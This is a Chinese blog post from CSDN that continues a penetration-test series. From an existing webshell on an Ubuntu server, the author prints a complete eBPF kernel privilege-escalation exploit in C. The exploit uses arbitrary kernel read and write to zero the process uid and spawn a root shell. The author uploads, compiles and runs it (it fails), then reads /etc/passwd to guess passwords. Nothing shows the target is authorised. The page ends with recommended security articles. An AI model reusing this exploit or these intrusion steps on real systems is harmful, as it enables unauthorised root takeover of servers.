web渗透测试篇

已于 2023-11-13 06:25:56 修改
阅读量320 收藏
点赞数 1
文章标签: web安全 安全 渗透测试 kali linux 命令模式 网络安全 tcp/ip
于 2022-03-04 16:07:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47421272/article/details/123277171
版权

目录

接上一篇渗透测试文章

0x01 收集内网信息

接上篇我们连接了webshell
先查看服务器的信息

在这里插入图片描述

0x02 漏洞信息利用

这里了解到了这台服务器是ubuntu系统
百度一下CVE

在这里插入图片描述

代码如下:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <stdint.h>
//偏移需要自己去计算
#define PHYS_OFFSET 0xffff880000000000
#define CRED_OFFSET 0x9b8 //0x5f8
#define UID_OFFSET 4
#define LOG_BUF_SIZE 65536
#define PROGSIZE 328 //-32

int sockets[2];
int mapfd, progfd;

//核心代码
char *__prog = 	"\xb4\x09\x00\x00\xff\xff\xff\xff"
		"\x55\x09\x02\x00\xff\xff\xff\xff"
		"\xb7\x00\x00\x00\x00\x00\x00\x00"
		"\x95\x00\x00\x00\x00\x00\x00\x00"                             //通过ebpf的检验,只要执行前4行,即成功通过
		"\x18\x19\x00\x00\x03\x00\x00\x00"
		"\x00\x00\x00\x00\x00\x00\x00\x00"
		"\xbf\x91\x00\x00\x00\x00\x00\x00"                             //1,r6=map[0]
		"\xbf\xa2\x00\x00\x00\x00\x00\x00"
		"\x07\x02\x00\x00\xfc\xff\xff\xff"
		"\x62\x0a\xfc\xff\x00\x00\x00\x00"
		"\x85\x00\x00\x00\x01\x00\x00\x00"
		"\x55\x00\x01\x00\x00\x00\x00\x00"
		"\x95\x00\x00\x00\x00\x00\x00\x00"
		"\x79\x06\x00\x00\x00\x00\x00\x00"
		"\xbf\x91\x00\x00\x00\x00\x00\x00"                              //2,r7=map[1]
		"\xbf\xa2\x00\x00\x00\x00\x00\x00"
		"\x07\x02\x00\x00\xfc\xff\xff\xff"
		"\x62\x0a\xfc\xff\x01\x00\x00\x00"
		"\x85\x00\x00\x00\x01\x00\x00\x00"
		"\x55\x00\x01\x00\x00\x00\x00\x00"
		"\x95\x00\x00\x00\x00\x00\x00\x00"
		"\x79\x07\x00\x00\x00\x00\x00\x00"
		"\xbf\x91\x00\x00\x00\x00\x00\x00"                               //3,r8=map[2]
		"\xbf\xa2\x00\x00\x00\x00\x00\x00"
		"\x07\x02\x00\x00\xfc\xff\xff\xff"
		"\x62\x0a\xfc\xff\x02\x00\x00\x00"
		"\x85\x00\x00\x00\x01\x00\x00\x00"
		"\x55\x00\x01\x00\x00\x00\x00\x00"
		"\x95\x00\x00\x00\x00\x00\x00\x00"
		"\x79\x08\x00\x00\x00\x00\x00\x00"
		"\xbf\x02\x00\x00\x00\x00\x00\x00"                               //r2=r0     从这里往下根据map[0](即r6)的值来执行代码
		"\xb7\x00\x00\x00\x00\x00\x00\x00"                               //r0=0
		"\x55\x06\x03\x00\x00\x00\x00\x00"                               //if r6!=0 jmpto if r6!=1
		"\x79\x73\x00\x00\x00\x00\x00\x00"                               //r3 = [r7]    指令一,任意读
		"\x7b\x32\x00\x00\x00\x00\x00\x00"                               //[r2]=r3
		"\x95\x00\x00\x00\x00\x00\x00\x00"                               //exit(0)
		"\x55\x06\x02\x00\x01\x00\x00\x00"                               //if r6!=1 jmpto [r7]=r8
		"\x7b\xa2\x00\x00\x00\x00\x00\x00"                               //[r2]=rbp     指令二,泄露栈地址
		"\x95\x00\x00\x00\x00\x00\x00\x00"                               //exit(0)
		"\x7b\x87\x00\x00\x00\x00\x00\x00"                               //[r7]=r8      指令三,任意写
		"\x95\x00\x00\x00\x00\x00\x00\x00";                              //exit(0)           

char bpf_log_buf[LOG_BUF_SIZE];
//封装一些bpf的操作,还有一些必要的结构体
static int bpf_prog_load(enum bpf_prog_type prog_type,
		  const struct bpf_insn *insns, int prog_len,
		  const char *license, int kern_version) {
	union bpf_attr attr = {
		.prog_type = prog_type,
		.insns = (__u64)insns,
		.insn_cnt = prog_len / sizeof(struct bpf_insn),
		.license = (__u64)license,
		.log_buf = (__u64)bpf_log_buf,
		.log_size = LOG_BUF_SIZE,
		.log_level = 1,
	};

	attr.kern_version = kern_version;

	bpf_log_buf[0] = 0;

	return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
		   int max_entries) {
	union bpf_attr attr = {
		.map_type = map_type,
		.key_size = key_size,
		.value_size = value_size,
		.max_entries = max_entries
	};

	return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

static int bpf_update_elem(uint64_t key, uint64_t value) {
	union bpf_attr attr = {
		.map_fd = mapfd,
		.key = (__u64)&key,
		.value = (__u64)&value,
		.flags = 0,
	};

	return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

static int bpf_lookup_elem(void *key, void *value) {
	union bpf_attr attr = {
		.map_fd = mapfd,
		.key = (__u64)key,
		.value = (__u64)value,
	};

	return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

static void __exit(char *err) {
	fprintf(stderr, "error: %s\n", err);
	exit(-1);
}

//准备函数
static void prep(void) {
	mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);             //创建公共缓冲区map
	if (mapfd < 0)
		__exit(strerror(errno));
	puts("mapfd finished");
	progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,                                        //加载注入的代码进内核
			(struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);

	if (progfd < 0)
		__exit(strerror(errno));
	puts("bpf_prog_load finished");
	if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))                                            //准备一个sockets作为套接口组,来进行通信
		__exit(strerror(errno));
	puts("socketpair finished");
	if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)         //将socket和map绑定,完成准备工作
		__exit(strerror(errno));
	puts("setsockopt finished");
}

//
static void writemsg(void) {
	char buffer[64];

	ssize_t n = write(sockets[0], buffer, sizeof(buffer));

	if (n < 0) {
		perror("write");
		return;
	}
	if (n != sizeof(buffer))
		fprintf(stderr, "short write: %lu\n", n);
}

//用来执行已经设置好的三个功能,其中:a是放着指令号,分别对应着指令一二三,b和c分别放着操作数,0、1、2分别对应三块map
#define __update_elem(a, b, c) \
	bpf_update_elem(0, (a)); \
	bpf_update_elem(1, (b)); \
	bpf_update_elem(2, (c)); \
	writemsg();

//下面都是把__update_elem做了简单的封装
static uint64_t get_value(int key) {
	uint64_t value;

	if (bpf_lookup_elem(&key, &value))
		__exit(strerror(errno));

	return value;
}

static uint64_t __get_fp(void) {
	__update_elem(1, 0, 0);

	return get_value(2);
}

static uint64_t __read(uint64_t addr) {
	__update_elem(0, addr, 0);

	return get_value(2);
}

static void __write(uint64_t addr, uint64_t val) {
	__update_elem(2, addr, val);
}
//计算task_struct的真实地址,泄露出来的栈地址,~是取反操作
static uint64_t get_sp(uint64_t addr) {
	return addr & ~(0x4000 - 1);
}

static void pwn(void) {
	uint64_t fp, sp, task_struct, credptr, uidptr;

	fp = __get_fp();
	if (fp < PHYS_OFFSET)                                          //1.使用指令一泄露栈地址
		__exit("bogus fp");
	
	sp = get_sp(fp);
	if (sp < PHYS_OFFSET)                                          //2.通过偏移地址,计算处真实的task_struct地址所在的地址
		__exit("bogus sp");
	
	task_struct = __read(sp);                                      //3.task_struct 指令一操作,在task_struct地址所在的地址处,取出task_struct的真实地址

	if (task_struct < PHYS_OFFSET)
		__exit("bogus task ptr");

	printf("task_struct = %lx\n", task_struct);

	credptr = __read(task_struct + CRED_OFFSET);                   //4.cred 指令一操作,在cred地址所在的地址处,取出cred的真实地址

	if (credptr < PHYS_OFFSET)
		__exit("bogus cred ptr");

	uidptr = credptr + UID_OFFSET;                                 //5.uid 指令一操作,在uid地址所在的地址处,取出uid的真实地址
	if (uidptr < PHYS_OFFSET)
		__exit("bogus uid ptr");

	printf("uidptr = %lx\n", uidptr);
	__write(uidptr, 0);                                            //6.指令三操作,将0写入uid中

	if (getuid() == 0) {
		printf("spawning root shell\n");
		system("id");
		system("/bin/sh");
		exit(0);
	}

	__exit("not vulnerable?");
}

int main(int argc, char **argv) {
	prep();
	pwn();

	return 0;
}

试试能不能利用

利用中国蚁剑上传EXP到服务器

在这里插入图片描述

gcc编译EXP

在这里插入图片描述

运行EXP

在这里插入图片描述

发现运行失败 提示被拒绝
只能想想其他办法了

0x03 猜解密码

查看etc/passwd

在这里插入图片描述

过滤出真实用户

在这里插入图片描述

列出了root真实用户
看看能不能猜解sql密码

在这里插入图片描述

这里弄了好久一直不成功…
直接跑路了 下次在弄…

由于本人时间有限,只能等到有时间再继续了。
在这里插入图片描述

天满唯一
关注
Web完整渗透测试
weixin_43916678的博客
09-25 1103
sql注入原理: 渗透测试流程: 上传文件的时候,如果服务器端脚本语言未对上传的文件进行严格的验证和过滤,就容易造成可以上传任意文件的情况,从而控制整个网站,甚至是服务器。 这个恶意的文件(php、asp、aspx、jsp等),又被称WebShell。 WebShell就是以asp、PHP、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称之为一种网页后门。 攻击者在入侵了一个网站后,通常会将这些asp或php 后门文件与网站服务器web目录下正常的网页文件混在一起,然后使用浏览器来访
渗透测试流(规范)
Kangjie_oo的博客
10-20 986
渗透测试流程1.明确目标2.信息收集(另外详写)3.漏洞探测(另外详写)4.漏洞验证5.信息分析6.获取所需7.信息整理8.形成报告 1.明确目标 1.1 确定范围(渗透目标的范围,ip,域名,内外网) 1.2 确定规则(能渗透到什么程度,时间?能否修改上传?能否提权等) 1.3 确定需求(web应用的漏洞(新上线的程序)?业务逻辑漏洞(针对业务)?人员权限管理漏洞(针对人员,权限等)立体全方位,根据自己需求和能力来确定能不能做,能做多少) 2.信息收集(另外详写) 方式:主动扫描,开放搜索等 开放搜索:
web安全攻防渗透测试笔记 (信安一班 李静)
m0_67855254的博客
04-07 1848
第三章sqlmap (1) 安装sqlmap前,需要先安装Python3.X Python Releases for Windows | Python.org (2) 在环境变量path中,增加python3.x 安装路径 (3) 下载sqlmap并解压缩: 地址:sqlmap: automatic SQL injection and database takeover tool Python sqlmap.py -uhttp://xxx.xxx.xxx/ Py...
记录第二次web渗透测试
m0_47421272的博客
01-11 3181
** 首先是一些渗透利用的工具: 1.dirb 2.nmap 3.nikto 4.中国蚁剑+weevely ** 开始 url:http://www.xxx.com/admin/media 首先尝试若口令登录 admin:admin 登不进去 用dirb扫描看看有没有敏感目录 先看看robots.txt有没有东西 什么都没有 继续看另一个 状态500的 ok啊 这里看了一下没有爆sql帐号密码绝对路径倒是有了 ...
web 渗透测试
Jang2023的博客
07-05 973
渗透测试 web 笔记
web渗透测试笔记
网络小白的博客
05-11 1171
web渗透测试笔记一、渗透测试方法论 渗透测试是实施安全评估的具体手段,方法论是在制定、实施安全评估的方案时,需要遵循的规则、惯例和过程,人们在网络,应用和系统或者三者结合的情况时,不断的摸索各种务实的理论和成熟的方法,总结出了一套理论--渗透测试方法论。二、渗透测试的分类 1、白盒测试 安全审计员可以获取被测单位的内部资料或不公开资料,可以以最小的工作量完成最高的精确度 2、黑盒测试 审计人员不知道被测单位的内部网络架构和操作系统,从外部来评估网络基础设施 黑盒测试难度高于白盒测试,白盒测试的精确度比黑盒
记录第一次web渗透测试
m0_47421272的博客
01-07 2935
** 刚学web渗透2个月 第一次实战。 ** 渗透利用的工具: 1.dirb 2.nmap 开始 朋友发给我一个链接,点进去看是一个后台 尝试弱口令登录.(user:admin pass:admin) 非常幸运,登录进了后台。 找上传点上传webshell。 这里上传没有格式限制。 上传webshell。可以上传成功。 右键复制链接地址。 使用weevely连接。 发现后缀没显示,应该过滤掉了,本人比较懒,webshell上传失败了。 那就使用dirb扫描该站点目录,看看有没有敏感目录。
超全的Web渗透自我学习资料合集(64).zip
09-30
web渗透: web渗透测试清单 web渗透: 自动化漏洞扫描 web渗透: Google Hacking web渗透: web服务器指纹识别 web渗透: 枚举web服务器应用 web渗透: 识别web应用框架 web渗透: 配置管理测试 web渗透: 身份管理测试 web...
[ 渗透测试面试 ] 渗透测试面试题大集合(详解),看完直怼面试官(十种web漏洞).pdf 程序员面试宝典(安全知识)
02-11
渗透测试面试】涉及到的是网络安全领域中渗透测试的相关面试问题,主要涵盖了SQL注入、XSS注入、CSRF、SSRF以及文件上传等常见的Web漏洞。以下是对这些知识点的详细解释: 1. **SQL注入**: - SQL注入是通过...
Web安全渗透测试基础入门视频.rar
08-13
Web安全渗透测试基础入门001ppt WEB爆破口令工具实现原理解析.wmv WEB各个架构信息探针补充Wmv WEB各个架构信息探针实战wmv WEB目录文件扫描工具实现原理解析.wmv WEB伪造数据包进行XSS攻击演示wmv 基于S平台搭建...
超实用!手把手教你如何3步进行Web渗透测试!_手工渗透测试
2301_77121488的博客
04-20 644
渗透测试,是渗透测试工程师完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标网络、主机、应用的安全作深入的探测,发现系统最脆弱的环节。如果说安全检测是"横向地毯式自动化扫描",那么渗透测试就是"纵向深度人工化入侵"。可见渗透测试的目的是发现目标系统潜在的业务漏洞风险。安全问题都体现在输入输出的问题上,能够分析数据流就有迹可循了。先知道渗透测试的流程,用工具找到漏洞,了解并且复现它。
网络安全Web渗透测试(全流程)
jennycisp的博客
11-02 2370
发现:一共开放两个端口,80为web访问端口,3389为windows远程登陆端口,嘿嘿嘿,试一下发现:是Windows Server 2003系统,OK,到此为止。
BurpSuite实战教程01-web渗透安全测试(靶场搭建及常见漏洞攻防)
liaomin416100569的专栏
12-13 1万+
渗透测试(Penetration test)即安全工程师模拟黑客,在合法授权范围内,通过信息搜集、漏洞挖掘、权限提升等行为,对目标对象进行安全测试(或攻击),最终找出安全风险并输出测试报告。Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透。Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。
Web完整渗透测试实例
热门推荐
chaojixiaojingang
10-10 3万+
学习一整套的web渗透测试实验对以后的测试工作很有帮助,所以我把学习环境中的实现写下来,提供对整个网站测试的经验。 目的: (1)了解黑客是如何通过漏洞入侵网站,并获得服务器权限; (2)学习渗透测试完整过程原理:       黑客通过挖掘网站的注入漏洞,进而获得管理员账号密码进去后台,通过数据库备份,拿到webshell;然后黑客登录shell,通过2003服务器的提权exp拿下服务器的权限。...
网络安全】空字节绕过:URL回调+XSS+SQL绕WAF
等风来
09-07 469
经过进一步测试,我发现WAF在解析HTTP请求时,如果发现恶意查询,会导致服务器挂起。如果我连续提交3个请求且服务器挂起,它就会阻止我的IP地址。
如何启动网络安全计划:首先要做的事情
网络研究观
09-07 1022
保护数据不是一次性的活动,而是一个持续的适应和改进过程。
如何做好网络安全
最新发布
dexunyun的博客
09-08 1043
面对日益复杂的网络威胁,企业必须高度重视网站安全,建立全面的安全防护体系,加强内部和外部安全防护,制定详细的应急响应计划,确保在发生安全事件时能够迅速响应并恢复服务。及时报警、零误报 基于智能监测分波算法对全国超50个监测节点智能任务分配,适应不同运营商、不同线路的网络状况,模拟真实的网络环境,提供精准、迅速的监测结果,并通过可视化风险评估报表、安全报告及风险告警等手段构建完善监测体系。一旦网站遭受攻击,这些数据可能被窃取、篡改或泄露,不仅损害企业利益,还可能侵犯用户隐私,导致法律纠纷和声誉损失。
Web安全之SQL注入:如何预防及解决
J老熊
09-07 1538
SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式。攻击者可以利用漏洞在未经授权的情况下访问数据库,执行原本不被允许的操作。例如,攻击者可以绕过身份验证、检索敏感信息,甚至删除数据。SQL注入是Web应用程序中最常见且最危险的安全漏洞之一,尤其是在涉及数据库操作的场景下,如电商交易系统。通过使用、严格的输入验证、最小权限原则以及使用ORM框架等方法,我们可以有效防止SQL注入攻击。开发人员需要养成良好的编码习惯,始终考虑潜在的安全问题,确保应用程序的安全性。
Web应用渗透测试:指纹识别与信息收集
"这资源是关于Web渗透测试的中期指南,主要聚焦于应用程序指纹识别这一关键环节。在进行Web安全测试时,首先需要通过指纹识别获取服务器和应用程序的相关信息,以便发现潜在的安全漏洞并制定有效的攻击策略。文章...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值